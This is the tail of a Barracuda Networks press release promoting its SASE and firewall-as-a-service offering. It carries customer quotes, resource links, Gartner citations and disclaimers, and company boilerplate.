"Barracuda offered the only cloud-native firewall-as-a-service that provided all the enterprise security levels we needed and even included SD-WAN for uninterrupted connectivity and reliable application access to Azure," **said Hans Redlich, IT Lead at Hagedorn Group of Companies, in a Barracuda case study.**

"Barracuda Secure Connector solutions made it easy for us to implement device connectivity and IoT-platform connectivity across our products," **said Ulrich Poeschl, Chief Information Security Officer at Test-Fuchs GmbH, in a Barracuda** **case study****.**

**Resources:**  
Check out the product page: https://www.barracuda.com/products/sase

Get the Gartner**®** report, How to Align SD-WAN Projects with SASE Initiatives: http://cuda.co/grptsdwansase

Gartner named Barracuda a Visionary in 2021 Magic Quadrant™ for Network Firewalls. Get the report: https://www.barracuda.com/networkfirewallsmq

**See the blog posts:  
**A closer look at the expansion of Barracuda's SASE platform: http://cuda.co/50895

Zero Trust adoption simplified: http://cuda.co/50893

Aligning SD-WAN projects with SASE initiatives: http://cuda.co/50891

**Citations:  
**1Gartner, "How to Align SD-WAN Projects With SASE Initiatives," by Bjarne Munch, Lisa Pierce, Craig Lawson, published December 1, 2021.

Gartner, Magic Quadrant for Network Firewalls, Rajpreet Kaur, Jeremy D'Hoinne, Nat Smith, Adam Hils, 1 November 2021

Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

**About Barracuda Discover.22 EMEA Partner Conference  
**Barracuda Discover.22 takes place May 17-19 in Athens, Greece. The informative event covers a wide range of topics, including security threats and trends, hands-on technical sessions, new product announcements, and the latest innovations in email protection, application and cloud security, network security, and data protection.

**About Barracuda  
**At Barracuda, we strive to make the world a safer place. We believe every business deserves access to cloud-first, enterprise-grade security solutions that are easy to buy, deploy, and use. We protect email, networks, data, and applications with innovative solutions that grow and adapt with our customers' journey. More than 200,000 organizations worldwide trust Barracuda to protect them — in ways they may not even know they are at risk — so they can focus on taking their business to the next level. For more information, visit barracuda.com. 

Barracuda Networks, Barracuda and the Barracuda Networks logo are registered trademarks or trademarks of Barracuda Networks, Inc. in the U.S. and other countries. Other trademarks are the property of their respective owners.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us